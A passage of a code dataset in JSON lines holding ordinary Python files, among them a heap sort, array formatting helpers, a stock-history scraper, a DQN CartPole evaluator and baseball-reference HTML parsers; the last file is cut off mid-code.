+{"seq_id":"274670484","text":"#Ask the user for a string and count the number of letter ‘a’ in that string.\ndef count_a (string):\n\tarray = list(string)\n\tprint (array)\n\tcount = 0\n\tfor i in range(len(array)):\n\t\tif array[i] == \"a\" or array[i] == \"A\":\n\t\t\tcount = count + 1\n\tprint (\"Number of letter \\\"a\\\" in the string: \" + str(count))\n\n\ndef main ():\n\t#Main program.\n\tx = input(\"Write a sentence or text of any length.\\n\")\n\tcount_a(x)\n\nmain()","sub_path":"letter_count.py","file_name":"letter_count.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"88398976","text":"from datetime import datetime\nimport functools\nimport itertools\n\nimport numpy as np\nimport pandas as pd\n\nfrom .pycompat import (OrderedDict, iteritems, itervalues, unicode_type,\n                       bytes_type)\n\n\ndef pretty_print(x, numchars):\n    \"\"\"Given an object `x`, call `str(x)` and format the returned string so\n    that it is numchars long, padding with trailing spaces or truncating with\n    ellipses as necessary\n    \"\"\"\n    s = str(x)\n    if len(s) > numchars:\n        return s[:(numchars - 3)] + '...'\n    else:\n        return s + ' ' * (numchars - len(s))\n\n\ndef wrap_indent(text, start='', length=None):\n    if length is None:\n        length = len(start)\n    indent = '\\n' + ' ' * length\n    return start + indent.join(x for x in text.splitlines())\n\n\ndef _get_indexer_at_least_n_items(shape, n_desired):\n    assert 0 < n_desired <= np.prod(shape)\n    cum_items = np.cumprod(shape[::-1])\n    n_steps = np.argmax(cum_items >= n_desired)\n    stop = int(np.ceil(float(n_desired) / np.r_[1, cum_items][n_steps]))\n    indexer = ((0,) * (len(shape) - 1 - n_steps) + (slice(stop),)\n               + (slice(None),) * n_steps)\n    return indexer\n\n\ndef first_n_items(x, n_desired):\n    \"\"\"Returns the first n_desired items of an array\"\"\"\n    # Unfortunately, we can't just do x.flat[:n_desired] here because x might\n    # not be a numpy.ndarray. Moreover, access to elements of x could be very\n    # expensive (e.g. 
if it's only available over DAP), so go out of our way to\n # get them in a single call to __getitem__ using only slices.\n if n_desired < 1:\n raise ValueError('must request at least one item')\n\n if x.size == 0:\n # work around for https://github.com/numpy/numpy/issues/5195\n return []\n\n if n_desired < x.size:\n indexer = _get_indexer_at_least_n_items(x.shape, n_desired)\n x = x[indexer]\n return np.asarray(x).flat[:n_desired]\n\n\ndef format_timestamp(t):\n \"\"\"Cast given object to a Timestamp and return a nicely formatted string\"\"\"\n datetime_str = str(pd.Timestamp(t))\n try:\n date_str, time_str = datetime_str.split()\n except ValueError:\n # catch NaT and others that don't split nicely\n return datetime_str\n else:\n if time_str == '00:00:00':\n return date_str\n else:\n return '%sT%s' % (date_str, time_str)\n\n\ndef format_item(x):\n \"\"\"Returns a succinct summary of an object as a string\"\"\"\n if isinstance(x, (np.datetime64, datetime)):\n return format_timestamp(x)\n elif isinstance(x, (unicode_type, bytes_type)):\n return repr(x)\n elif isinstance(x, (float, np.float)):\n return '{0:.4}'.format(x)\n else:\n return str(x)\n\n\ndef format_array_flat(items_ndarray, max_width):\n \"\"\"Return a formatted string for as many items in the flattened version of\n items_ndarray that will fit within max_width characters\n \"\"\"\n # every item will take up at least two characters\n max_possibly_relevant = int(np.ceil(max_width / 2.0))\n relevant_items = first_n_items(items_ndarray, max_possibly_relevant)\n pprint_items = list(map(format_item, relevant_items))\n\n end_padding = ' ...'\n\n cum_len = np.cumsum([len(s) + 1 for s in pprint_items])\n gt_max_width = cum_len > (max_width - len(end_padding))\n if not gt_max_width.any():\n num_to_print = len(pprint_items)\n else:\n num_to_print = max(np.argmax(gt_max_width) - 1, 1)\n\n pprint_str = ' '.join(itertools.islice(pprint_items, int(num_to_print)))\n remaining_chars = max_width - len(pprint_str) - len(end_padding)\n if remaining_chars > 0 and num_to_print < items_ndarray.size:\n pprint_str += end_padding\n return pprint_str\n\n\ndef _summarize_var_or_coord(name, var, col_width, show_values=True,\n marker=' ', max_width=100):\n first_col = pretty_print(' %s %s ' % (marker, name), col_width)\n dims_str = '(%s) ' % ', '.join(map(str, var.dims)) if var.dims else ''\n front_str = first_col + dims_str + ('%s ' % var.dtype)\n if show_values:\n values_str = format_array_flat(var, max_width - len(front_str))\n else:\n values_str = '...'\n return front_str + values_str\n\n\ndef _not_remote(var):\n \"\"\"Helper function to identify if array is positively identifiable as\n coming from a remote source.\n \"\"\"\n source = var.encoding.get('source')\n if source and source.startswith('http') and not var._in_memory:\n return False\n return True\n\n\ndef summarize_var(name, var, col_width):\n show_values = _not_remote(var)\n return _summarize_var_or_coord(name, var, col_width, show_values)\n\n\ndef summarize_coord(name, var, col_width):\n is_index = name in var.dims\n show_values = is_index or _not_remote(var)\n marker = '*' if is_index else ' '\n return _summarize_var_or_coord(name, var, col_width, show_values, marker)\n\n\ndef _maybe_truncate(obj, maxlen=500):\n s = str(obj)\n if len(s) > maxlen:\n s = s[:(maxlen - 3)] + '...'\n return s\n\n\ndef summarize_attr(key, value, col_width=None):\n # ignore col_width for now to more clearly distinguish attributes\n return ' %s: %s' % (key, _maybe_truncate(value))\n\n\nEMPTY_REPR = ' *empty*'\n\n\ndef 
_calculate_col_width(mapping):\n    max_name_length = max(len(str(k)) for k in mapping) if mapping else 0\n    col_width = max(max_name_length, 7) + 6\n    return col_width\n\n\ndef _mapping_repr(mapping, title, summarizer, col_width=None):\n    if col_width is None:\n        col_width = _calculate_col_width(mapping)\n    summary = ['%s:' % title]\n    if mapping:\n        summary += [summarizer(k, v, col_width) for k, v in mapping.items()]\n    else:\n        summary += [EMPTY_REPR]\n    return '\\n'.join(summary)\n\n\ncoords_repr = functools.partial(_mapping_repr, title='Coordinates',\n                                summarizer=summarize_coord)\n\n\nvars_repr = functools.partial(_mapping_repr, title='Data variables',\n                              summarizer=summarize_var)\n\n\nattrs_repr = functools.partial(_mapping_repr, title='Attributes',\n                               summarizer=summarize_attr)\n\n\ndef indexes_repr(indexes):\n    summary = []\n    for k, v in indexes.items():\n        summary.append(wrap_indent(repr(v), '%s: ' % k))\n    return '\\n'.join(summary)\n\n\ndef array_repr(arr):\n    # used for DataArray, Variable and Coordinate\n    if hasattr(arr, 'name') and arr.name is not None:\n        name_str = '%r ' % arr.name\n    else:\n        name_str = ''\n    dim_summary = ', '.join('%s: %s' % (k, v) for k, v\n                            in zip(arr.dims, arr.shape))\n\n    summary = ['<xray.%s %s(%s)>' % (type(arr).__name__, name_str, dim_summary)]\n\n    if arr.size < 1e5 or arr._in_memory:\n        summary.append(repr(arr.values))\n    else:\n        summary.append('[%s values with dtype=%s]' % (arr.size, arr.dtype))\n\n    if hasattr(arr, 'coords'):\n        if arr.coords:\n            summary.append(repr(arr.coords))\n\n    if arr.attrs:\n        summary.append(attrs_repr(arr.attrs))\n\n    return '\\n'.join(summary)\n\n\ndef dataset_repr(ds):\n    summary = ['<xray.%s>' % type(ds).__name__]\n\n    col_width = _calculate_col_width(ds)\n\n    dims_start = pretty_print('Dimensions:', col_width)\n    all_dim_strings = ['%s: %s' % (k, v) for k, v in iteritems(ds.dims)]\n    summary.append('%s(%s)' % (dims_start, ', '.join(all_dim_strings)))\n\n    summary.append(coords_repr(ds.coords, col_width=col_width))\n    summary.append(vars_repr(ds.data_vars, col_width=col_width))\n    if ds.attrs:\n        summary.append(attrs_repr(ds.attrs))\n\n    return '\\n'.join(summary)\n","sub_path":"xray/core/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":7547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"273952947","text":"def heapsort(arr):\n    # create a heap and assign it to a variable\n    heap = Heap()\n    # create an empty list to append to\n    sorted_list = []\n    # for every item in the array passed in as an argument,\n    # insert the item into the heap variable\n    for num in arr:\n        heap.insert(num)\n    # while the size of the heap is greater than 0,\n    # insert the return from heap.delete\n    # to the first index of the sorted_list\n    while heap.size > 0:\n        # sorted_list = [heap.delete()] + sorted\n        sorted_list.insert(0, heap.delete())\n    # return the sorted list\n    return sorted_list\n\n\n# heapsort given in solution lecture\n# def heapsort(arr):\n#     heap = Heap()\n#     sorted = [0] * len(arr)\n\n#     for el in arr:\n#         heap.insert(el)\n\n#     for i in range(len(arr)):\n#         sorted[len(arr) - i - 1] = heap.delete()\n\n#     return sorted\n\n\nclass Heap:\n    def __init__(self):\n        self.storage = [0]\n        self.size = 0\n\n    def insert(self, value):\n        self.storage.append(value)\n        self.size += 1\n        self._bubble_up(self.size)\n\n    def delete(self):\n        retval = self.storage[1]\n        self.storage[1] = self.storage[self.size]\n        self.size -= 1\n        self.storage.pop()\n        self._sift_down(1)\n        return retval\n\n    def get_max(self):\n        return self.storage[1]\n\n    def 
get_size(self):\n return self.size\n\n def _bubble_up(self, index):\n while index // 2 > 0:\n if self.storage[index // 2] < self.storage[index]:\n self.storage[index], self.storage[index // 2] = (\n self.storage[index // 2],\n self.storage[index],\n )\n index = index // 2\n\n def _sift_down(self, index):\n while (index * 2) <= self.size:\n mc = self._max_child(index)\n if self.storage[index] < self.storage[mc]:\n self.storage[index], self.storage[mc] = (\n self.storage[mc],\n self.storage[index],\n )\n index = mc\n\n def _max_child(self, index):\n if index * 2 + 1 > self.size:\n return index * 2\n else:\n return (\n index * 2\n if self.storage[index * 2] > self.storage[index * 2 + 1]\n else index * 2 + 1\n )\n","sub_path":"data_structures/ex_2/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131851167","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 10 12:34:53 2018\n\n@author: Donghyun Kim\n\"\"\"\nimport pandas as pd\n\nclass YahooDailyReader():\n def __init__(self, symbol=None, start=None, end=None):\n import datetime, time\n self.symbol = symbol\n \n # initialize start/end dates if not provided\n if end is None:\n end = datetime.datetime(2018,6,25)\n if start is None:\n start = datetime.datetime(2000,1,1)\n \n self.start = start\n self.end = end\n \n # convert dates to unix time strings\n unix_start = int(time.mktime(self.start.timetuple()))\n day_end = self.end.replace(hour=23, minute=59, second=59)\n unix_end = int(time.mktime(day_end.timetuple()))\n \n url = 'https://finance.yahoo.com/quote/{}/history?'\n url += 'period1={}&period2={}'\n url += '&filter=history'\n url += '&interval=1d'\n url += '&frequency=1d'\n self.url = url.format(self.symbol, unix_start, unix_end)\n \n def read(self):\n import requests, re, json\n try: \n r = requests.get(self.url)\n \n ptrn = r'root\\.App\\.main = (.*?);\\n}\\(this\\)\\);'\n txt = re.search(ptrn, r.text, re.DOTALL).group(1)\n jsn = json.loads(txt)\n\n df = pd.DataFrame(jsn['context']['dispatcher']['stores']['HistoricalPriceStore']['prices'])\n\n \n #df.insert(0, 'symbol', self.symbol)\n df['date'] = pd.to_datetime(df['date'], unit='s').dt.date\n \n # drop rows that aren't prices\n df = df.dropna(subset=['close'])\n \n df = df[['date', 'high', 'low', 'open', 'close', 'volume', 'adjclose']]\n df = df.set_index('date')\n return df\n except Exception as e:\n print(self.symbol,e )\n \ndef save_kospi200_history(history_dir,yy,mm,dd):\n import datetime\n kospi_list=pd.read_csv('kospi200.csv',sep='\\t',engine='python',header=None) \n for kospi in kospi_list[:].values:\n ticker=kospi[0][:6]\n ydr = YahooDailyReader(ticker+'.KS',end=datetime.datetime(yy,mm,dd))\n df = ydr.read()\n try:\n df=df.iloc[::-1]\n df.to_csv(history_dir+'/{}.csv'.format(ticker))\n print(datetime.datetime(yy,mm,dd),'{}.csv is saved'.format(ticker))\n except AttributeError:\n print('######'+ticker+'is not avaible######' )\n #time.sleep(0.1)\n \nif (__name__==\"__main__\"):\n save_kospi200_history('./stock/kospi200_2014',2018,6,29)\n ","sub_path":"download_kospi.py","file_name":"download_kospi.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"246899556","text":"import os\nimport json\nimport requests\n\n\npath_testdata = './data/webmention_rocks_test'\ntest_data = {}\n\nfor n in range(1, 22):\n url = 'https://webmention.rocks/test/%d' % n\n hfile 
= '%s_%d.html' % (path_testdata, n)\n    jfile = '%s_%d.json' % (path_testdata, n)\n    if not os.path.exists(hfile):\n        r = requests.get(url)\n\n        # binary mode: the response text is encoded to bytes before writing\n        with open(hfile, 'wb') as h:\n            h.write(r.text.encode('utf-8'))\n        with open(jfile, 'w') as h:\n            h.write(json.dumps(dict(r.headers), indent=2))\n","sub_path":"tests/rebuild_data.py","file_name":"rebuild_data.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"210220938","text":"import collections\n\ndef factorial(x: int):\n    res = 1\n    for i in range(1, x+1):\n        res = res * i\n    return res\n\ndefdict = collections.defaultdict(lambda:factorial)\n\nfor i in range(7):\n    defdict[i] = defdict[i](i)\n\nprint(defdict)","sub_path":"sessions/15/konstantin_shrayber/DefDict.py","file_name":"DefDict.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"158393292","text":"import requests\n\nECHO_URL = 'https://fast-oasis-5535.herokuapp.com'\n\n\ndef add_message(name, message):\n    url = ECHO_URL + '/message'\n    data = {'name': name, 'message': message}\n    result = requests.post(url, json=data)\n    messages = result.json()['messages']\n    return messages\n\n\ndef get_messages():\n    url = ECHO_URL + '/messages'\n    result = requests.get(url)\n    messages = result.json()['messages']\n    return messages\n\n\ndef clear_messages():\n    url = ECHO_URL + '/clear'\n    result = requests.get(url)\n    messages = result.json()['messages']\n    return messages\n\n\nif __name__ == '__main__':\n    print('add_messages()')\n\n    name = 'zedd+sg'\n    message = 'want you to know'\n    messages = add_message(name, message)\n    for m in messages:\n        print(m['name'], m['message'])\n\n    print('get_messages()')\n    messages = get_messages()\n    for m in messages:\n        print(m['name'], m['message'])\n","sub_path":"lesson08-review/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"125030921","text":"#coding: utf-8\r\n\"\"\"\r\nA store has put a product on sale, offering a certain percentage of discount\r\non the purchase amount. Write a Python program that determines the purchase amount,\r\nthe discount amount, and the amount to pay for buying a certain number of units of the product\r\n\"\"\"\r\n\r\ndescuento = float(input(\"Enter the discount percentage: \"))\r\nnum_prod = int(input(\"Enter the number of products: \"))\r\nimp_prod = [] #Stores the cost price of each product\r\ndes_prod = [] #Stores the discount amount\r\npag_prod = [] #Stores the amount to pay for the product after the discount\r\nif(descuento>100):\r\n    print(\"Error: The discount cannot be greater than 100%\")\r\n    exit()\r\n\r\nfor n in range(1,num_prod+1):\r\n    precio_prod = float( input(\"Cost of product N°0\"+str(n)+\" : \") )\r\n    imp_prod.append( precio_prod )\r\n    des_prod.append( precio_prod * descuento/100.00)\r\n    pag_prod.append( precio_prod * (1-descuento/100.00))\r\n\r\nfor n in range(0,num_prod):\r\n    print(\"Product N°0\"+str(n+1)+\": \")\r\n    print(\"\\tCost : S/\"+str(imp_prod[n]))\r\n    print(\"\\tDiscount : S/\"+str(des_prod[n]))\r\n    print(\"\\tAmount to pay: S/\"+str(pag_prod[n]))\r\n","sub_path":"E05.py","file_name":"E05.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"363714952","text":"import pytest\n\nimport stk\n\nfrom ..case_data import CaseData\nfrom .utilities import Counter\n\n_counter = Counter()\n\n\ndef _get_case_data(mongo_client):\n    \"\"\"\n    Get a :class:`.CaseData` instance.\n\n    Parameters\n    ----------\n    mongo_client : :class:`pymongo.MongoClient`\n        The mongo client the database should connect to.\n\n    \"\"\"\n\n    # The basic idea here is that the _counter.get_count method will\n    # return a different \"fitness value\" each time it is called.\n    # When the test runs fitness_calculator.get_fitness_value(), if\n    # caching is working, the same number as before will be returned.\n    # However, if caching is not working, a different number will be\n    # returned as the fitness value.\n\n    db = stk.ValueMongoDb(\n        mongo_client=mongo_client,\n        collection=\"test_caching\",\n        database=\"_stk_pytest_database\",\n    )\n\n    fitness_calculator = stk.PropertyVector(\n        property_functions=(_counter.get_count,),\n        input_database=db,\n        output_database=db,\n    )\n    molecule = stk.BuildingBlock(\"BrCCBr\")\n    fitness_value = fitness_calculator.get_fitness_value(molecule)\n\n    return CaseData(\n        fitness_calculator=fitness_calculator,\n        molecule=molecule,\n        fitness_value=fitness_value,\n    )\n\n\n@pytest.fixture(\n    params=(_get_case_data,),\n)\ndef property_vector(request, mongo_client):\n    return request.param(mongo_client)\n","sub_path":"tests/ea/fitness_calculator/test_caching/fixtures/property_vector.py","file_name":"property_vector.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"128058476","text":"import gym\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import InputLayer, Dense, Input\nimport matplotlib.pyplot as plt\nimport pickle\nimport imageio\n\n\n# Parameters\nENV = 'CartPole-v0'\nPATH_REWARD_01 = '../objects/dqn_cartpole_ep_reward.pkl'\nPATH_REWARD_02 = '../objects/dqn_cartpole_ma_reward.pkl'\nPATH_SAVEFIG_01 = '../images/dqn_cartpole_episode_reward.png'\nPATH_SAVEFIG_02 = '../images/dqn_cartpole_average_reward.png'\nPATH_MODEL = '../model/dqn_cartpole_target_model_1000.h5'\nPATH_VIDEO = 
'../videos/dqn_cartpole.gif'\nEPISODE = 5\nFPS = 30\n\n\ndef get_model(num_states, num_actions):\n    inputs = Input(shape=(num_states,))\n    out = Dense(128, activation='relu')(inputs)\n    out = Dense(128, activation='relu')(out)\n    outputs = Dense(num_actions, activation='linear')(out)\n    model = Model(inputs, outputs)\n    return model\n\n\ndef main():\n    # Episode reward\n    ep_reward = pickle.load(open(PATH_REWARD_01, 'rb'))\n    plt.plot(ep_reward)\n    plt.savefig(PATH_SAVEFIG_01)\n    plt.show()\n\n    # Average reward\n    avg_reward = pickle.load(open(PATH_REWARD_02, 'rb'))\n    plt.plot(avg_reward)\n    plt.savefig(PATH_SAVEFIG_02)\n    plt.show()\n\n    # Environment\n    env = gym.make(ENV)\n    num_states = env.observation_space.shape[0]\n    num_actions = env.action_space.n\n\n    # Model\n    # model = Model(num_states=num_states, num_actions=num_actions)\n    model = get_model(num_states=num_states, num_actions=num_actions)\n    model.load_weights(PATH_MODEL)\n\n    # Evaluation video\n    with imageio.get_writer(PATH_VIDEO, fps=FPS) as video:\n\n        for i in range(EPISODE):\n\n            # Initialize\n            state = env.reset()\n            done = False\n            screen = env.render(mode='rgb_array')\n            video.append_data(screen)\n\n            # Start episode\n            while not done:\n\n                # Get action\n                action = model(np.atleast_2d(state.astype('float32')))\n                action = np.argmax(action[0])\n\n                # Get next state\n                next_state, _, done, _ = env.step(action)\n                screen = env.render(mode='rgb_array')\n                video.append_data(screen)\n                state = next_state\n\n            print(f'Episode {i+1} finished')\n\n    env.close()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"dqs/dqn_cartpole_evaluate.py","file_name":"dqn_cartpole_evaluate.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"253513256","text":"from typing import Optional\n\nfrom strictdoc.backend.dsl.models.document_config import DocumentConfig\nfrom strictdoc.core.document_meta import DocumentMeta\n\n\nclass Document(object):\n    def __init__(\n        self, name, title, config: DocumentConfig, free_texts, section_contents\n    ):\n        assert isinstance(free_texts, list)\n        self.name = name if name else title\n        self.config = config if config else DocumentConfig.default_config(self)\n        self.free_texts = free_texts\n        self.section_contents = section_contents\n\n        self.ng_sections = []\n        self.ng_level = 0\n        self.ng_needs_generation = False\n        self.meta: Optional[DocumentMeta] = None\n        self.legacy_title_is_used = True if name else False\n\n    def __str__(self):\n        return \"Document: <name: {}, section_contents: {}>\".format(\n            self.name, self.section_contents\n        )\n\n    def __repr__(self):\n        return self.__str__()\n\n    def assign_meta(self, meta):\n        assert isinstance(meta, DocumentMeta)\n        self.meta = meta\n","sub_path":"strictdoc/backend/dsl/models/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"199175499","text":"import html.parser, re\n\n\nclass GameTeamsParser(html.parser.HTMLParser):\n    awayTeamAbb = ''\n    homeTeamAbb = ''\n    startData = False\n\n    def handle_starttag(self, tag, attrs):\n        if tag == 'pre':\n            self.startData = True\n        elif self.startData and tag == 'a':\n            for x in attrs:\n                if x[0] == 'href':\n                    if self.awayTeamAbb == '':\n                        self.awayTeamAbb = x[1].split('/')[2]\n                    else:\n                        self.homeTeamAbb = x[1].split('/')[2]\n\n    def handle_endtag(self, tag):\n        if tag == 'pre':\n            self.startData = False\n\n    def handle_data(self, data):\n        pass\n\n\nclass GameTimeParser(html.parser.HTMLParser):\n    
startData = False\n    startData1 = False\n    time = ''\n    gamelen = ''\n\n    def handle_starttag(self, tag, attrs):\n        if tag == 'div' and self.time == '':\n            for att in attrs:\n                if att[0] == 'class' and att[1] == 'bold_text float_left':\n                    self.startData = True\n        elif tag == 'div' and self.gamelen == '':\n            for att in attrs:\n                if att[0] == 'id' and att[1] == 'gametime':\n                    self.startData1 = True\n\n    def handle_endtag(self, tag):\n        if tag == 'div' and self.startData:\n            self.startData = False\n        elif tag == 'div' and self.startData1:\n            self.startData1 = False\n\n    def handle_data(self, data):\n        if self.startData:\n            if re.search('[0-9]{1,2}:[0-9]{2} ?[ap]m', data, flags=re.IGNORECASE) != None:\n                self.time = str(re.search('[0-9]{1,2}:[0-9]{2} ?[ap]m', data, flags=re.IGNORECASE).group(0))\n        if self.startData1:\n            if re.search('[0-9]{1,2}:[0-9]{2}', data) != None:\n                self.gamelen = str(re.search('[0-9]{1,2}:[0-9]{2}', data).group(0))\n\n\nclass GameWeatherParser(html.parser.HTMLParser):\n    startData = False\n    startData1 = False\n    weather = ''\n    field = ''\n\n    def handle_starttag(self, tag, attrs):\n        if tag == 'div':\n            for att in attrs:\n                if att[0] == 'id' and att[1] == 'weather':\n                    self.startData = True\n                elif att[0] == 'id' and att[1] == 'fieldcond':\n                    self.startData1 = True\n\n    def handle_endtag(self, tag):\n        if tag == 'div' and self.startData:\n            self.startData = False\n        elif tag == 'div' and self.startData1:\n            self.startData1 = False\n\n    def handle_data(self, data):\n        if self.startData:\n            self.weather += data\n        elif self.startData1:\n            self.field += data\n\n\nclass GameUmpParser(html.parser.HTMLParser):\n    startData = False\n    homeump = ''\n\n    def handle_starttag(self, tag, attrs):\n        if tag == 'div':\n            for x in attrs:\n                if x[0] == 'id' and x[1] == 'Umpires':\n                    self.startData = True\n\n    def handle_endtag(self, tag):\n        if tag == 'div' and self.startData:\n            self.startData = False\n\n    def handle_data(self, data):\n        if self.startData:\n            if re.search('HP ?- ?(.*), 1B', data) != None:\n                self.homeump = re.search('HP ?- ?(.*), 1B', data).group(1)\n\n\nclass GameWinLossSaveParser(html.parser.HTMLParser):\n    startData = False\n    startWin = False\n    startLoss = False\n    startSave = False\n    winPitch = ''\n    lossPitch = ''\n    savePitch = ''\n\n    def handle_starttag(self, tag, attrs):\n        if tag == 'td':\n            for x in attrs:\n                if x[0] == 'class' and x[1] == 'padding_left small_text':\n                    self.startData = True\n\n    def handle_endtag(self, tag):\n        if self.startData and tag == 'td':\n            self.startData = False\n\n    def handle_data(self, data):\n        if self.startData:\n            if data == 'W:':\n                self.startWin = True\n            elif self.startWin and data.strip() != '':\n                self.winPitch = data\n                self.startWin = False\n            elif data == 'L:':\n                self.startLoss = True\n            elif self.startLoss and data.strip() != '':\n                self.lossPitch = data\n                self.startLoss = False\n            elif data == 'S:':\n                self.startSave = True\n            elif self.startSave and data.strip() != '':\n                self.savePitch = data\n                self.startSave = False\n\n\nclass BRPlayParser(html.parser.HTMLParser):\n    startData = False\n    insideTable = False\n    subRow = False\n    index = 0\n    playNum = 0\n    plays = {}\n    subs = {}\n\n    def handle_starttag(self, tag, attrs):\n        for att in attrs:\n            if att[0] == 'id' and att[1][:6] == 'event_':\n                self.startData = True\n                self.playNum = int(att[1].split('_')[1])\n                self.plays[self.playNum] = ['', '', '', '', '', '', '', '', '', '', '', '']\n        if tag == 'td' and self.startData:\n            self.insideTable = True\n        if tag == 'span':\n            # iterate the attributes here; spans without attributes would otherwise crash\n            for att in attrs:\n                if att[0] == 'class' and att[1] == 'ingame_substitution':\n                    self.subRow = True\n                    self.subs[self.playNum] = ''\n\n    def handle_data(self, data):\n        if self.startData and 
self.insideTable:\n self.plays[self.playNum][self.index] += data\n if self.subRow:\n self.subs[self.playNum] += data\n\n def handle_endtag(self, tag):\n if tag == 'tr' and self.startData:\n self.startData = False\n self.index = 0\n elif tag == 'td' and self.insideTable:\n self.insideTable = False\n self.index += 1\n elif tag == 'span' and self.subRow:\n self.subs[self.playNum] += ';'\n elif tag == 'tr' and self.subRow:\n self.subRow = False\n\n def handle_entityref(self, name):\n if name == 'nbsp' and self.startData and self.insideTable:\n self.plays[self.playNum][self.index] += ' '\n elif name == 'nbsp' and self.subRow:\n self.subs[self.playNum] += ' '\n\n\nclass BRLineupParser(html.parser.HTMLParser):\n startData = False\n tdFound = False\n lineup = []\n entry = []\n\n def handle_starttag(self, tag, attrs):\n if tag == 'table':\n for att in attrs:\n if att[0] == 'id' and att[1] == 'lineups':\n self.startData = True\n elif self.startData and tag == 'td':\n self.tdFound = True\n elif self.tdFound and tag == 'a':\n for att in attrs:\n if att[0] == 'href':\n userid = re.search('/players/./(.*)\\.shtml', att[1]).group(1) if re.search('/players/./(.*)\\.shtml', att[1]) else ''\n self.entry.append(userid)\n\n def handle_data(self, data):\n if self.tdFound:\n self.entry.append(data)\n\n def handle_endtag(self, tag):\n if self.startData and tag == 'td':\n self.tdFound = False\n elif self.startData and tag == 'tr':\n self.lineup.append(self.entry)\n self.entry = []\n elif self.startData and tag == 'table':\n self.startData = False\n\n\nclass BRPitcherParser(html.parser.HTMLParser):\n startData = False\n tdCount = 0\n pitcher = []\n roster = []\n team = 'A'\n\n def handle_starttag(self, tag, attrs):\n if tag == 'table':\n for att in attrs:\n if att[0] == 'id' and len(att[1]) > 7 and att[1][-8:] == 'pitching':\n self.startData = True\n elif self.startData and tag == 'td':\n self.tdCount += 1\n elif self.startData and tag == 'a':\n for att in attrs:\n if att[0] == 'href':\n if re.search('/([^/])*\\.shtml', att[1]) is not None:\n uid = re.search('/([^/]*)\\.shtml', att[1]).group(1)\n self.pitcher.append(uid)\n\n def handle_data(self, data):\n if self.startData:\n if self.tdCount == 1:\n self.pitcher.append(data)\n elif self.tdCount == 9:\n self.pitcher.append(data)\n if data == 'Team Totals':\n self.team = 'H'\n\n def handle_endtag(self, tag):\n if self.startData and tag == 'table':\n self.startData = False\n elif self.startData and tag == 'tr':\n if len(self.pitcher) > 0 and self.pitcher[0] != 'Team Totals':\n self.pitcher.append(self.team)\n self.roster.append(self.pitcher)\n self.pitcher = []\n self.tdCount = 0\n elif self.startData and tag == 'td':\n self.tdCount += 1\n\n\nclass BRBatterParser(html.parser.HTMLParser):\n startData = False\n tdCount = 0\n batID = {}\n batValue = ''\n found = False\n\n def handle_starttag(self, tag, attrs):\n if tag == 'table':\n for att in attrs:\n if att[0] == 'id' and len(att[1]) > 6 and att[1][-7:] == 'batting':\n self.startData = True\n elif tag == 'a' and self.startData and self.found == False:\n for att in attrs:\n if att[0] == 'href':\n if re.search('/([^/])*\\.shtml', att[1]) is not None:\n self.batValue = re.search('/([^/]*)\\.shtml', att[1]).group(1)\n\n\n\n def handle_data(self, data):\n if self.startData and self.found == False and self.batValue != '':\n self.batID[data] = self.batValue\n self.found = True\n\n\n def handle_endtag(self, tag):\n if self.startData and tag == 'table':\n self.startData = False\n elif self.startData and tag == 'a' and 
self.found:\n self.found = False\n self.batValue = ''\n\n\n\nclass GamesParser(html.parser.HTMLParser):\n startData = False\n games = []\n BRabbrevs = ['ARI', 'ATL', 'BAL', 'BOS', 'CHC', 'CHW', 'CIN', 'CLE', 'COL', 'DET', 'HOU', 'KCR', 'LAA', 'LAD',\n 'MIA', 'MIL', 'MIN', 'NYM', 'NYY', 'OAK', 'PHI', 'PIT', 'SDP', 'SEA', 'SFG', 'STL', 'TBR', 'TEX',\n 'TOR', 'WSN']\n a = ''\n h = ''\n lastIn = 'H'\n\n def handle_starttag(self, tag, attrs):\n prefix = \"http://www.baseball-reference.com\"\n if tag == 'div' and len(attrs) > 0 and attrs[0][1] == 'game_summaries':\n self.startData = True\n if self.startData and tag == 'a':\n for att in attrs:\n if att[0] == 'href' and att[1][:6] == '/boxes':\n self.games.append(att[1])\n\n def handle_data(self, data):\n if data == 'Up To This Date':\n self.startData = False\n\n def handle_endtag(self, tag):\n pass\n\n\n\nclass BRPlayerInfoParser(html.parser.HTMLParser):\n height = ''\n weight = ''\n birthDate = ''\n mlbDebutDate = ''\n batHand = ''\n throwHand = ''\n foundWeight = False\n foundHeight = False\n foundBat = False\n foundBorn = False\n foundDebut = False\n foundThrow = False\n\n def handle_starttag(self, tag, attrs):\n pass\n\n def handle_data(self, data):\n if data == 'Weight:':\n self.foundWeight = True\n elif self.foundWeight:\n self.weight = data\n self.foundWeight = False\n elif data == 'Height:':\n self.foundHeight = True\n elif self.foundHeight:\n self.height = data\n self.foundHeight = False\n elif data == 'Bats:':\n self.foundBat = True\n elif self.foundBat:\n self.batHand = data\n self.foundBat = False\n elif data == 'Throws:':\n self.foundThrow = True\n elif 